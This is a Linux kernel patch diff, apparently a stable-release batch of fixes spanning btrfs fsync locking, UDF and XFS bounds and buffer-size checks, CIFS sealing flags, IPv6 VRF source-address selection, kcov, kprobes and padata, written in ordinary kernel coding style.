+@@ -1294,13 +1294,7 @@ static vm_fault_t vhost_vdpa_fault(struct vm_fault *vmf)
+ 
+ 	notify = ops->get_vq_notification(vdpa, index);
+ 
+-	vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
+-	if (remap_pfn_range(vma, vmf->address & PAGE_MASK,
+-			    PFN_DOWN(notify.addr), PAGE_SIZE,
+-			    vma->vm_page_prot))
+-		return VM_FAULT_SIGBUS;
+-
+-	return VM_FAULT_NOPAGE;
++	return vmf_insert_pfn(vma, vmf->address & PAGE_MASK, PFN_DOWN(notify.addr));
+ }
+ 
+ static const struct vm_operations_struct vhost_vdpa_vm_ops = {
+diff --git a/fs/btrfs/ctree.h b/fs/btrfs/ctree.h
+index cca1acf2e0371..853b1f96b1fdc 100644
+--- a/fs/btrfs/ctree.h
++++ b/fs/btrfs/ctree.h
+@@ -1553,6 +1553,7 @@ struct btrfs_drop_extents_args {
+ struct btrfs_file_private {
+ 	void *filldir_buf;
+ 	u64 last_index;
++	bool fsync_skip_inode_lock;
+ };
+ 
+ 
+diff --git a/fs/btrfs/file.c b/fs/btrfs/file.c
+index 1783a0fbf1665..e23d178f97782 100644
+--- a/fs/btrfs/file.c
++++ b/fs/btrfs/file.c
+@@ -1526,21 +1526,37 @@ static ssize_t btrfs_direct_write(struct kiocb *iocb, struct iov_iter *from)
+ 	 * So here we disable page faults in the iov_iter and then retry if we
+ 	 * got -EFAULT, faulting in the pages before the retry.
+ 	 */
++again:
+ 	from->nofault = true;
+ 	dio = btrfs_dio_write(iocb, from, written);
+ 	from->nofault = false;
+ 
+-	/*
+-	 * iomap_dio_complete() will call btrfs_sync_file() if we have a dsync
+-	 * iocb, and that needs to lock the inode. So unlock it before calling
+-	 * iomap_dio_complete() to avoid a deadlock.
+-	 */
+-	btrfs_inode_unlock(inode, ilock_flags);
+-
+-	if (IS_ERR_OR_NULL(dio))
++	if (IS_ERR_OR_NULL(dio)) {
+ 		err = PTR_ERR_OR_ZERO(dio);
+-	else
++	} else {
++		struct btrfs_file_private stack_private = { 0 };
++		struct btrfs_file_private *private;
++		const bool have_private = (file->private_data != NULL);
++
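++		/*
++		 * If the file has no private yet, borrow an on-stack one so
++		 * that btrfs_sync_file() can see the skip flag set below.
++		 */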
++		if (!have_private)
++			file->private_data = &stack_private;
++
++		/*
++		 * If we have a synchronous write, we must make sure the fsync
++		 * triggered by the iomap_dio_complete() call below doesn't
++		 * deadlock on the inode lock - we are already holding it and we
++		 * can't call it after unlocking because we may need to complete
++		 * partial writes due to the input buffer (or parts of it) not
++		 * being already faulted in.
++		 */
++		private = file->private_data;
++		private->fsync_skip_inode_lock = true;
+ 		err = iomap_dio_complete(dio);
++		private->fsync_skip_inode_lock = false;
++
++		if (!have_private)
++			file->private_data = NULL;
++	}
+ 
+ 	/* No increment (+=) because iomap returns a cumulative value. */
+ 	if (err > 0)
+@@ -1567,10 +1583,12 @@ static ssize_t btrfs_direct_write(struct kiocb *iocb, struct iov_iter *from)
+ 		} else {
+ 			fault_in_iov_iter_readable(from, left);
+ 			prev_left = left;
+-			goto relock;
++			goto again;
+ 		}
+ 	}
+ 
++	btrfs_inode_unlock(inode, ilock_flags);
++
+ 	/*
+ 	 * If 'err' is -ENOTBLK or we have not written all data, then it means
+ 	 * we must fallback to buffered IO.
+@@ -1777,6 +1795,7 @@ static inline bool skip_inode_logging(const struct btrfs_log_ctx *ctx)
+  */
+ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ {
++	struct btrfs_file_private *private = file->private_data;
+ 	struct dentry *dentry = file_dentry(file);
+ 	struct inode *inode = d_inode(dentry);
+ 	struct btrfs_fs_info *fs_info = btrfs_sb(inode->i_sb);
+@@ -1786,6 +1805,7 @@ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ 	int ret = 0, err;
+ 	u64 len;
+ 	bool full_sync;
++	const bool skip_ilock = (private ? private->fsync_skip_inode_lock : false);
+ 
+ 	trace_btrfs_sync_file(file, datasync);
+ 
+@@ -1813,7 +1833,10 @@ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ 	if (ret)
+ 		goto out;
+ 
+-	btrfs_inode_lock(inode, BTRFS_ILOCK_MMAP);
++	if (skip_ilock)
++		down_write(&BTRFS_I(inode)->i_mmap_lock);
++	else
++		btrfs_inode_lock(inode, BTRFS_ILOCK_MMAP);
+ 
+ 	atomic_inc(&root->log_batch);
+ 
+@@ -1837,7 +1860,10 @@ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ 	 */
+ 	ret = start_ordered_ops(inode, start, end);
+ 	if (ret) {
+-		btrfs_inode_unlock(inode, BTRFS_ILOCK_MMAP);
++		if (skip_ilock)
++			up_write(&BTRFS_I(inode)->i_mmap_lock);
++		else
++			btrfs_inode_unlock(inode, BTRFS_ILOCK_MMAP);
+ 		goto out;
+ 	}
+ 
+@@ -1940,7 +1966,10 @@ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ 	 * file again, but that will end up using the synchronization
+ 	 * inside btrfs_sync_log to keep things safe.
+ 	 */
+-	btrfs_inode_unlock(inode, BTRFS_ILOCK_MMAP);
++	if (skip_ilock)
++		up_write(&BTRFS_I(inode)->i_mmap_lock);
++	else
++		btrfs_inode_unlock(inode, BTRFS_ILOCK_MMAP);
+ 
+ 	if (ret == BTRFS_NO_LOG_SYNC) {
+ 		ret = btrfs_end_transaction(trans);
+@@ -2008,7 +2037,10 @@ int btrfs_sync_file(struct file *file, loff_t start, loff_t end, int datasync)
+ 
+ out_release_extents:
+ 	btrfs_release_log_ctx_extents(&ctx);
+-	btrfs_inode_unlock(inode, BTRFS_ILOCK_MMAP);
++	if (skip_ilock)
++		up_write(&BTRFS_I(inode)->i_mmap_lock);
++	else
++		btrfs_inode_unlock(inode, BTRFS_ILOCK_MMAP);
+ 	goto out;
+ }
+ 
+diff --git a/fs/btrfs/free-space-cache.c b/fs/btrfs/free-space-cache.c
+index 76d52d682b3b0..21d262da386d5 100644
+--- a/fs/btrfs/free-space-cache.c
++++ b/fs/btrfs/free-space-cache.c
+@@ -865,6 +865,7 @@ static int __load_free_space_cache(struct btrfs_root *root, struct inode *inode,
+ 				spin_unlock(&ctl->tree_lock);
+ 				btrfs_err(fs_info,
+ 					"Duplicate entries in free space cache, dumping");
++				kmem_cache_free(btrfs_free_space_bitmap_cachep, e->bitmap);
+ 				kmem_cache_free(btrfs_free_space_cachep, e);
+ 				goto free_cache;
+ 			}
+diff --git a/fs/btrfs/print-tree.c b/fs/btrfs/print-tree.c
+index 228eeb04d03d3..144b7bd05346e 100644
+--- a/fs/btrfs/print-tree.c
++++ b/fs/btrfs/print-tree.c
+@@ -9,7 +9,7 @@
+ 
+ struct root_name_map {
+ 	u64 id;
+-	char name[16];
++	const char *name;
+ };
+ 
+ static const struct root_name_map root_map[] = {
+diff --git a/fs/ext4/inline.c b/fs/ext4/inline.c
+index 3a91be1d9bbe7..ee9d2faa5218f 100644
+--- a/fs/ext4/inline.c
++++ b/fs/ext4/inline.c
+@@ -1439,7 +1439,11 @@ int ext4_inlinedir_to_tree(struct file *dir_file,
+ 			hinfo->hash = EXT4_DIRENT_HASH(de);
+ 			hinfo->minor_hash = EXT4_DIRENT_MINOR_HASH(de);
+ 		} else {
+-			ext4fs_dirhash(dir, de->name, de->name_len, hinfo);
++			err = ext4fs_dirhash(dir, de->name, de->name_len, hinfo);
++			if (err) {
++				ret = err;
++				goto out;
++			}
+ 		}
+ 		if ((hinfo->hash < start_hash) ||
+ 		    ((hinfo->hash == start_hash) &&
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 71ce3ed5ab6ba..004ad321a45d6 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -2226,8 +2226,7 @@ int ext4_mb_find_by_goal(struct ext4_allocation_context *ac,
+ 	if (max >= ac->ac_g_ex.fe_len && ac->ac_g_ex.fe_len == sbi->s_stripe) {
+ 		ext4_fsblk_t start;
+ 
+-		start = ext4_group_first_block_no(ac->ac_sb, e4b->bd_group) +
+-			ex.fe_start;
++		start = ext4_grp_offs_to_block(ac->ac_sb, &ex);
+ 		/* use do_div to get remainder (would be 64-bit modulo) */
+ 		if (do_div(start, sbi->s_stripe) == 0) {
+ 			ac->ac_found++;
+diff --git a/fs/jbd2/journal.c b/fs/jbd2/journal.c
+index b136b46b63bc9..c8d59f7c47453 100644
+--- a/fs/jbd2/journal.c
++++ b/fs/jbd2/journal.c
+@@ -409,6 +409,7 @@ int jbd2_journal_write_metadata_buffer(transaction_t *transaction,
+ 		tmp = jbd2_alloc(bh_in->b_size, GFP_NOFS);
+ 		if (!tmp) {
+ 			brelse(new_bh);
++			free_buffer_head(new_bh);
+ 			return -ENOMEM;
+ 		}
+ 		spin_lock(&jh_in->b_state_lock);
+diff --git a/fs/smb/client/cifs_debug.c b/fs/smb/client/cifs_debug.c
+index a2afdf9c5f80b..0c0a7fcc4cebc 100644
+--- a/fs/smb/client/cifs_debug.c
++++ b/fs/smb/client/cifs_debug.c
+@@ -960,7 +960,7 @@ static int cifs_security_flags_proc_open(struct inode *inode, struct file *file)
+ static void
+ cifs_security_flags_handle_must_flags(unsigned int *flags)
+ {
+-	unsigned int signflags = *flags & CIFSSEC_MUST_SIGN;
++	unsigned int signflags = *flags & (CIFSSEC_MUST_SIGN | CIFSSEC_MUST_SEAL);
+ 
+ 	if ((*flags & CIFSSEC_MUST_KRB5) == CIFSSEC_MUST_KRB5)
+ 		*flags = CIFSSEC_MUST_KRB5;
+diff --git a/fs/smb/client/cifsglob.h b/fs/smb/client/cifsglob.h
+index 1564febd1439f..7b702b3cf7b87 100644
+--- a/fs/smb/client/cifsglob.h
++++ b/fs/smb/client/cifsglob.h
+@@ -1820,7 +1820,7 @@ static inline bool is_retryable_error(int error)
+ #define   CIFSSEC_MAY_SIGN	0x00001
+ #define   CIFSSEC_MAY_NTLMV2	0x00004
+ #define   CIFSSEC_MAY_KRB5	0x00008
+-#define   CIFSSEC_MAY_SEAL	0x00040 /* not supported yet */
++#define   CIFSSEC_MAY_SEAL	0x00040
+ #define   CIFSSEC_MAY_NTLMSSP	0x00080 /* raw ntlmssp with ntlmv2 */
+ 
+ #define   CIFSSEC_MUST_SIGN	0x01001
+@@ -1830,11 +1830,11 @@ require use of the stronger protocol */
+ #define   CIFSSEC_MUST_NTLMV2	0x04004
+ #define   CIFSSEC_MUST_KRB5	0x08008
+ #ifdef CONFIG_CIFS_UPCALL
+-#define   CIFSSEC_MASK          0x8F08F /* flags supported if no weak allowed */
++#define   CIFSSEC_MASK          0xCF0CF /* flags supported if no weak allowed */
+ #else
+-#define	  CIFSSEC_MASK          0x87087 /* flags supported if no weak allowed */
++#define	  CIFSSEC_MASK          0xC70C7 /* flags supported if no weak allowed */
+ #endif /* UPCALL */
+-#define   CIFSSEC_MUST_SEAL	0x40040 /* not supported yet */
++#define   CIFSSEC_MUST_SEAL	0x40040
+ #define   CIFSSEC_MUST_NTLMSSP	0x80080 /* raw ntlmssp with ntlmv2 */
+ 
+ #define   CIFSSEC_DEF (CIFSSEC_MAY_SIGN | CIFSSEC_MAY_NTLMV2 | CIFSSEC_MAY_NTLMSSP | CIFSSEC_MAY_SEAL)
+diff --git a/fs/smb/client/smb2pdu.c b/fs/smb/client/smb2pdu.c
+index e15bf116c7558..fad4b5dcfbd5a 100644
+--- a/fs/smb/client/smb2pdu.c
++++ b/fs/smb/client/smb2pdu.c
+@@ -80,6 +80,9 @@ int smb3_encryption_required(const struct cifs_tcon *tcon)
+ 	if (tcon->seal &&
+ 	    (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
+ 		return 1;
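++	/* Also honour a global "must seal" policy for this tree connection. */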
++	if (((global_secflags & CIFSSEC_MUST_SEAL) == CIFSSEC_MUST_SEAL) &&
++	    (tcon->ses->server->capabilities & SMB2_GLOBAL_CAP_ENCRYPTION))
++		return 1;
+ 	return 0;
+ }
+ 
+diff --git a/fs/udf/balloc.c b/fs/udf/balloc.c
+index c4c18eeacb60c..aa73ab1b50a52 100644
+--- a/fs/udf/balloc.c
++++ b/fs/udf/balloc.c
+@@ -22,6 +22,7 @@
+ #include "udfdecl.h"
+ 
+ #include <linux/bitops.h>
++#include <linux/overflow.h>
+ 
+ #include "udf_i.h"
+ #include "udf_sb.h"
+@@ -144,7 +145,6 @@ static void udf_bitmap_free_blocks(struct super_block *sb,
+ {
+ 	struct udf_sb_info *sbi = UDF_SB(sb);
+ 	struct buffer_head *bh = NULL;
+-	struct udf_part_map *partmap;
+ 	unsigned long block;
+ 	unsigned long block_group;
+ 	unsigned long bit;
+@@ -153,19 +153,9 @@ static void udf_bitmap_free_blocks(struct super_block *sb,
+ 	unsigned long overflow;
+ 
+ 	mutex_lock(&sbi->s_alloc_mutex);
+-	partmap = &sbi->s_partmaps[bloc->partitionReferenceNum];
+-	if (bloc->logicalBlockNum + count < count ||
+-	    (bloc->logicalBlockNum + count) > partmap->s_partition_len) {
+-		udf_debug("%u < %d || %u + %u > %u\n",
+-			  bloc->logicalBlockNum, 0,
+-			  bloc->logicalBlockNum, count,
+-			  partmap->s_partition_len);
+-		goto error_return;
+-	}
+-
++	/* We make sure this cannot overflow when mounting the filesystem */
+ 	block = bloc->logicalBlockNum + offset +
+ 		(sizeof(struct spaceBitmapDesc) << 3);
+-
+ 	do {
+ 		overflow = 0;
+ 		block_group = block >> (sb->s_blocksize_bits + 3);
+@@ -395,7 +385,6 @@ static void udf_table_free_blocks(struct super_block *sb,
+ 				  uint32_t count)
+ {
+ 	struct udf_sb_info *sbi = UDF_SB(sb);
+-	struct udf_part_map *partmap;
+ 	uint32_t start, end;
+ 	uint32_t elen;
+ 	struct kernel_lb_addr eloc;
+@@ -404,16 +393,6 @@ static void udf_table_free_blocks(struct super_block *sb,
+ 	struct udf_inode_info *iinfo;
+ 
+ 	mutex_lock(&sbi->s_alloc_mutex);
+-	partmap = &sbi->s_partmaps[bloc->partitionReferenceNum];
+-	if (bloc->logicalBlockNum + count < count ||
+-	    (bloc->logicalBlockNum + count) > partmap->s_partition_len) {
+-		udf_debug("%u < %d || %u + %u > %u\n",
+-			  bloc->logicalBlockNum, 0,
+-			  bloc->logicalBlockNum, count,
+-			  partmap->s_partition_len);
+-		goto error_return;
+-	}
+-
+ 	iinfo = UDF_I(table);
+ 	udf_add_free_space(sb, sbi->s_partition, count);
+ 
+@@ -688,6 +667,17 @@ void udf_free_blocks(struct super_block *sb, struct inode *inode,
+ {
+ 	uint16_t partition = bloc->partitionReferenceNum;
+ 	struct udf_part_map *map = &UDF_SB(sb)->s_partmaps[partition];
++	uint32_t blk;
++
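++	/* Reject ranges that wrap around or extend past the partition end. */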
++	if (check_add_overflow(bloc->logicalBlockNum, offset, &blk) ||
++	    check_add_overflow(blk, count, &blk) ||
++	    bloc->logicalBlockNum + count > map->s_partition_len) {
++		udf_debug("Invalid request to free blocks: (%d, %u), off %u, "
++			  "len %u, partition len %u\n",
++			  partition, bloc->logicalBlockNum, offset, count,
++			  map->s_partition_len);
++		return;
++	}
+ 
+ 	if (map->s_partition_flags & UDF_PART_FLAG_UNALLOC_BITMAP) {
+ 		udf_bitmap_free_blocks(sb, map->s_uspace.s_bitmap,
+diff --git a/fs/xfs/xfs_log_recover.c b/fs/xfs/xfs_log_recover.c
+index 322eb2ee6c550..05e48523ea400 100644
+--- a/fs/xfs/xfs_log_recover.c
++++ b/fs/xfs/xfs_log_recover.c
+@@ -2960,7 +2960,7 @@ xlog_do_recovery_pass(
+ 	int			error = 0, h_size, h_len;
+ 	int			error2 = 0;
+ 	int			bblks, split_bblks;
+-	int			hblks, split_hblks, wrapped_hblks;
++	int			hblks = 1, split_hblks, wrapped_hblks;
+ 	int			i;
+ 	struct hlist_head	rhash[XLOG_RHASH_SIZE];
+ 	LIST_HEAD		(buffer_list);
+@@ -3016,14 +3016,22 @@ xlog_do_recovery_pass(
+ 		if (error)
+ 			goto bread_err1;
+ 
+-		hblks = xlog_logrec_hblks(log, rhead);
+-		if (hblks != 1) {
+-			kmem_free(hbp);
+-			hbp = xlog_alloc_buffer(log, hblks);
++		/*
++		 * This open codes xlog_logrec_hblks so that we can reuse the
++		 * fixed up h_size value calculated above.  Without that we'd
++		 * still allocate the buffer based on the incorrect on-disk
++		 * size.
++		 */
++		if (h_size > XLOG_HEADER_CYCLE_SIZE &&
++		    (rhead->h_version & cpu_to_be32(XLOG_VERSION_2))) {
++			hblks = DIV_ROUND_UP(h_size, XLOG_HEADER_CYCLE_SIZE);
++			if (hblks > 1) {
++				kmem_free(hbp);
++				hbp = xlog_alloc_buffer(log, hblks);
++			}
+ 		}
+ 	} else {
+ 		ASSERT(log->l_sectBBsize == 1);
+-		hblks = 1;
+ 		hbp = xlog_alloc_buffer(log, 1);
+ 		h_size = XLOG_BIG_RECORD_BSIZE;
+ 	}
+diff --git a/include/linux/blk-integrity.h b/include/linux/blk-integrity.h
+index 378b2459efe2d..f7cc8080672cc 100644
+--- a/include/linux/blk-integrity.h
++++ b/include/linux/blk-integrity.h
+@@ -105,14 +105,13 @@ static inline bool blk_integrity_rq(struct request *rq)
+ }
+ 
+ /*
+- * Return the first bvec that contains integrity data.  Only drivers that are
+- * limited to a single integrity segment should use this helper.
++ * Return the current bvec that contains the integrity data. bip_iter may be
++ * advanced to iterate over the integrity data.
+  */
+-static inline struct bio_vec *rq_integrity_vec(struct request *rq)
++static inline struct bio_vec rq_integrity_vec(struct request *rq)
+ {
+-	if (WARN_ON_ONCE(queue_max_integrity_segments(rq->q) > 1))
+-		return NULL;
+-	return rq->bio->bi_integrity->bip_vec;
++	return mp_bvec_iter_bvec(rq->bio->bi_integrity->bip_vec,
++				 rq->bio->bi_integrity->bip_iter);
+ }
+ #else /* CONFIG_BLK_DEV_INTEGRITY */
+ static inline int blk_rq_count_integrity_sg(struct request_queue *q,
+@@ -176,9 +175,10 @@ static inline int blk_integrity_rq(struct request *rq)
+ 	return 0;
+ }
+ 
+-static inline struct bio_vec *rq_integrity_vec(struct request *rq)
++static inline struct bio_vec rq_integrity_vec(struct request *rq)
+ {
+-	return NULL;
++	/* the optimizer will remove all calls to this function */
++	return (struct bio_vec){ };
+ }
+ #endif /* CONFIG_BLK_DEV_INTEGRITY */
+ #endif /* _LINUX_BLK_INTEGRITY_H */
+diff --git a/include/linux/clocksource.h b/include/linux/clocksource.h
+index 1d42d4b173271..0ad8b550bb4b4 100644
+--- a/include/linux/clocksource.h
++++ b/include/linux/clocksource.h
+@@ -291,7 +291,19 @@ static inline void timer_probe(void) {}
+ #define TIMER_ACPI_DECLARE(name, table_id, fn)		\
+ 	ACPI_DECLARE_PROBE_ENTRY(timer, name, table_id, 0, NULL, 0, fn)
+ 
+-extern ulong max_cswd_read_retries;
++static inline unsigned int clocksource_get_max_watchdog_retry(void)
++{
++	/*
++	 * When system is in the boot phase or under heavy workload, there
++	 * can be random big latencies during the clocksource/watchdog
++	 * read, so allow retries to filter the noise latency. As the
++	 * latency's frequency and maximum value goes up with the number of
++	 * CPUs, scale the number of retries with the number of online
++	 * CPUs.
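++	 * For example: 1 CPU -> 1 retry, 16 CPUs -> 3, 256 CPUs -> 5.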
++	 */
++	return (ilog2(num_online_cpus()) / 2) + 1;
++}
++
+ void clocksource_verify_percpu(struct clocksource *cs);
+ 
+ #endif /* _LINUX_CLOCKSOURCE_H */
+diff --git a/include/linux/pci_ids.h b/include/linux/pci_ids.h
+index 2c1371320c295..f680897794fa2 100644
+--- a/include/linux/pci_ids.h
++++ b/include/linux/pci_ids.h
+@@ -2109,6 +2109,8 @@
+ 
+ #define PCI_VENDOR_ID_CHELSIO		0x1425
+ 
++#define PCI_VENDOR_ID_EDIMAX		0x1432
++
+ #define PCI_VENDOR_ID_ADLINK		0x144a
+ 
+ #define PCI_VENDOR_ID_SAMSUNG		0x144d
+diff --git a/include/linux/profile.h b/include/linux/profile.h
+index 11db1ec516e27..12da750a88a04 100644
+--- a/include/linux/profile.h
++++ b/include/linux/profile.h
+@@ -11,7 +11,6 @@
+ 
+ #define CPU_PROFILING	1
+ #define SCHED_PROFILING	2
+-#define SLEEP_PROFILING	3
+ #define KVM_PROFILING	4
+ 
+ struct proc_dir_entry;
+diff --git a/include/linux/trace_events.h b/include/linux/trace_events.h
+index c8b5e9781d01a..f70624ec4188f 100644
+--- a/include/linux/trace_events.h
++++ b/include/linux/trace_events.h
+@@ -847,7 +847,6 @@ do {									\
+ struct perf_event;
+ 
+ DECLARE_PER_CPU(struct pt_regs, perf_trace_regs);
+-DECLARE_PER_CPU(int, bpf_kprobe_override);
+ 
+ extern int  perf_trace_init(struct perf_event *event);
+ extern void perf_trace_destroy(struct perf_event *event);
+diff --git a/include/net/ip6_route.h b/include/net/ip6_route.h
+index 035d61d50a989..4cd0839c86c92 100644
+--- a/include/net/ip6_route.h
++++ b/include/net/ip6_route.h
+@@ -132,18 +132,26 @@ void rt6_age_exceptions(struct fib6_info *f6i, struct fib6_gc_args *gc_args,
+ 
+ static inline int ip6_route_get_saddr(struct net *net, struct fib6_info *f6i,
+ 				      const struct in6_addr *daddr,
+-				      unsigned int prefs,
++				      unsigned int prefs, int l3mdev_index,
+ 				      struct in6_addr *saddr)
+ {
++	struct net_device *l3mdev;
++	struct net_device *dev;
++	bool same_vrf;
+ 	int err = 0;
+ 
+-	if (f6i && f6i->fib6_prefsrc.plen) {
++	rcu_read_lock();
++
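++	/* Only trust the route's preferred source address when its nexthop
++	 * device is in the same VRF (l3mdev) the lookup is scoped to.
++	 */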
++	l3mdev = dev_get_by_index_rcu(net, l3mdev_index);
++	if (!f6i || !f6i->fib6_prefsrc.plen || l3mdev)
++		dev = f6i ? fib6_info_nh_dev(f6i) : NULL;
++	same_vrf = !l3mdev || l3mdev_master_dev_rcu(dev) == l3mdev;
++	if (f6i && f6i->fib6_prefsrc.plen && same_vrf)
+ 		*saddr = f6i->fib6_prefsrc.addr;
+-	} else {
+-		struct net_device *dev = f6i ? fib6_info_nh_dev(f6i) : NULL;
++	else
++		err = ipv6_dev_get_saddr(net, same_vrf ? dev : l3mdev, daddr, prefs, saddr);
+ 
+-		err = ipv6_dev_get_saddr(net, dev, daddr, prefs, saddr);
+-	}
++	rcu_read_unlock();
+ 
+ 	return err;
+ }
+diff --git a/include/net/netfilter/nf_tables.h b/include/net/netfilter/nf_tables.h
+index 9a80d0251d8f3..e365302fed95d 100644
+--- a/include/net/netfilter/nf_tables.h
++++ b/include/net/netfilter/nf_tables.h
+@@ -387,7 +387,7 @@ static inline void *nft_expr_priv(const struct nft_expr *expr)
+ 	return (void *)expr->data;
+ }
+ 
+-int nft_expr_clone(struct nft_expr *dst, struct nft_expr *src);
++int nft_expr_clone(struct nft_expr *dst, struct nft_expr *src, gfp_t gfp);
+ void nft_expr_destroy(const struct nft_ctx *ctx, struct nft_expr *expr);
+ int nft_expr_dump(struct sk_buff *skb, unsigned int attr,
+ 		  const struct nft_expr *expr);
+@@ -889,7 +889,7 @@ struct nft_expr_ops {
+ 						struct nft_regs *regs,
+ 						const struct nft_pktinfo *pkt);
+ 	int				(*clone)(struct nft_expr *dst,
+-						 const struct nft_expr *src);
++						 const struct nft_expr *src, gfp_t gfp);
+ 	unsigned int			size;
+ 
+ 	int				(*init)(const struct nft_ctx *ctx,
+diff --git a/include/trace/events/intel_ifs.h b/include/trace/events/intel_ifs.h
+index d7353024016cc..af0af3f1d9b7c 100644
+--- a/include/trace/events/intel_ifs.h
++++ b/include/trace/events/intel_ifs.h
+@@ -10,25 +10,25 @@
+ 
+ TRACE_EVENT(ifs_status,
+ 
+-	TP_PROTO(int cpu, union ifs_scan activate, union ifs_status status),
++	TP_PROTO(int cpu, int start, int stop, u64 status),
+ 
+-	TP_ARGS(cpu, activate, status),
++	TP_ARGS(cpu, start, stop, status),
+ 
+ 	TP_STRUCT__entry(
+ 		__field(	u64,	status	)
+ 		__field(	int,	cpu	)
+-		__field(	u8,	start	)
+-		__field(	u8,	stop	)
++		__field(	u16,	start	)
++		__field(	u16,	stop	)
+ 	),
+ 
+ 	TP_fast_assign(
+ 		__entry->cpu	= cpu;
+-		__entry->start	= activate.start;
+-		__entry->stop	= activate.stop;
+-		__entry->status	= status.data;
++		__entry->start	= start;
++		__entry->stop	= stop;
++		__entry->status	= status;
+ 	),
+ 
+-	TP_printk("cpu: %d, start: %.2x, stop: %.2x, status: %llx",
++	TP_printk("cpu: %d, start: %.4x, stop: %.4x, status: %.16llx",
+ 		__entry->cpu,
+ 		__entry->start,
+ 		__entry->stop,
+diff --git a/kernel/irq/irqdesc.c b/kernel/irq/irqdesc.c
+index fd09962744014..5b173b79051cd 100644
+--- a/kernel/irq/irqdesc.c
++++ b/kernel/irq/irqdesc.c
+@@ -493,6 +493,7 @@ static int alloc_descs(unsigned int start, unsigned int cnt, int node,
+ 				flags = IRQD_AFFINITY_MANAGED |
+ 					IRQD_MANAGED_SHUTDOWN;
+ 			}
++			flags |= IRQD_AFFINITY_SET;
+ 			mask = &affinity->mask;
+ 			node = cpu_to_node(cpumask_first(mask));
+ 			affinity++;
+diff --git a/kernel/jump_label.c b/kernel/jump_label.c
+index eec802175ccc6..1ed269b2c4035 100644
+--- a/kernel/jump_label.c
++++ b/kernel/jump_label.c
+@@ -231,7 +231,7 @@ void static_key_disable_cpuslocked(struct static_key *key)
+ 	}
+ 
+ 	jump_label_lock();
+-	if (atomic_cmpxchg(&key->enabled, 1, 0))
++	if (atomic_cmpxchg(&key->enabled, 1, 0) == 1)
+ 		jump_label_update(key);
+ 	jump_label_unlock();
+ }
+@@ -284,7 +284,7 @@ static void __static_key_slow_dec_cpuslocked(struct static_key *key)
+ 		return;
+ 
+ 	guard(mutex)(&jump_label_mutex);
+-	if (atomic_cmpxchg(&key->enabled, 1, 0))
++	if (atomic_cmpxchg(&key->enabled, 1, 0) == 1)
+ 		jump_label_update(key);
+ 	else
+ 		WARN_ON_ONCE(!static_key_slow_try_dec(key));
+diff --git a/kernel/kcov.c b/kernel/kcov.c
+index fe3308dfd6a73..9413f27294ca1 100644
+--- a/kernel/kcov.c
++++ b/kernel/kcov.c
+@@ -161,6 +161,15 @@ static void kcov_remote_area_put(struct kcov_remote_area *area,
+ 	kmsan_unpoison_memory(&area->list, sizeof(area->list));
+ }
+ 
++/*
++ * Unlike in_serving_softirq(), this function returns false when called during
++ * a hardirq or an NMI that happened in the softirq context.
++ */
++static inline bool in_softirq_really(void)
++{
++	return in_serving_softirq() && !in_hardirq() && !in_nmi();
++}
++
+ static notrace bool check_kcov_mode(enum kcov_mode needed_mode, struct task_struct *t)
+ {
+ 	unsigned int mode;
+@@ -170,7 +179,7 @@ static notrace bool check_kcov_mode(enum kcov_mode needed_mode, struct task_stru
+ 	 * so we ignore code executed in interrupts, unless we are in a remote
+ 	 * coverage collection section in a softirq.
+ 	 */
+-	if (!in_task() && !(in_serving_softirq() && t->kcov_softirq))
++	if (!in_task() && !(in_softirq_really() && t->kcov_softirq))
+ 		return false;
+ 	mode = READ_ONCE(t->kcov_mode);
+ 	/*
+@@ -847,7 +856,7 @@ void kcov_remote_start(u64 handle)
+ 
+ 	if (WARN_ON(!kcov_check_handle(handle, true, true, true)))
+ 		return;
+-	if (!in_task() && !in_serving_softirq())
++	if (!in_task() && !in_softirq_really())
+ 		return;
+ 
+ 	local_lock_irqsave(&kcov_percpu_data.lock, flags);
+@@ -989,7 +998,7 @@ void kcov_remote_stop(void)
+ 	int sequence;
+ 	unsigned long flags;
+ 
+-	if (!in_task() && !in_serving_softirq())
++	if (!in_task() && !in_softirq_really())
+ 		return;
+ 
+ 	local_lock_irqsave(&kcov_percpu_data.lock, flags);
+diff --git a/kernel/kprobes.c b/kernel/kprobes.c
+index 5b5ee060a2db5..4c4fc4d309b8b 100644
+--- a/kernel/kprobes.c
++++ b/kernel/kprobes.c
+@@ -1552,8 +1552,8 @@ static bool is_cfi_preamble_symbol(unsigned long addr)
+ 	if (lookup_symbol_name(addr, symbuf))
+ 		return false;
+ 
+-	return str_has_prefix("__cfi_", symbuf) ||
+-		str_has_prefix("__pfx_", symbuf);
++	return str_has_prefix(symbuf, "__cfi_") ||
++		str_has_prefix(symbuf, "__pfx_");
+ }
+ 
+ static int check_kprobe_address_safe(struct kprobe *p,
+diff --git a/kernel/padata.c b/kernel/padata.c
+index 0261bced7eb6e..11270ffca54e0 100644
+--- a/kernel/padata.c
++++ b/kernel/padata.c
+@@ -508,6 +508,13 @@ void __init padata_do_multithreaded(struct padata_mt_job *job)
+ 	ps.chunk_size = max(ps.chunk_size, job->min_chunk);
+ 	ps.chunk_size = roundup(ps.chunk_size, job->align);
+ 
++	/*
++	 * chunk_size can be 0 if the caller sets min_chunk to 0. So force it
++	 * to at least 1 to prevent divide-by-0 panic in padata_mt_helper().
++	 */
++	if (!ps.chunk_size)
++		ps.chunk_size = 1U;
++
+ 	list_for_each_entry(pw, &works, pw_list)
+ 		queue_work(system_unbound_wq, &pw->pw_work);
+ 
+diff --git a/kernel/profile.c b/kernel/profile.c
+index 8a77769bc4b4c..984f819b701c9 100644
+--- a/kernel/profile.c
++++ b/kernel/profile.c
+@@ -57,20 +57,11 @@ static DEFINE_MUTEX(profile_flip_mutex);
+ int profile_setup(char *str)
+ {
+ 	static const char schedstr[] = "schedule";
+-	static const char sleepstr[] = "sleep";
+ 	static const char kvmstr[] = "kvm";
+ 	const char *select = NULL;
+ 	int par;
+ 
+-	if (!strncmp(str, sleepstr, strlen(sleepstr))) {
+-#ifdef CONFIG_SCHEDSTATS
+-		force_schedstat_enabled();
+-		prof_on = SLEEP_PROFILING;
+-		select = sleepstr;
+-#else
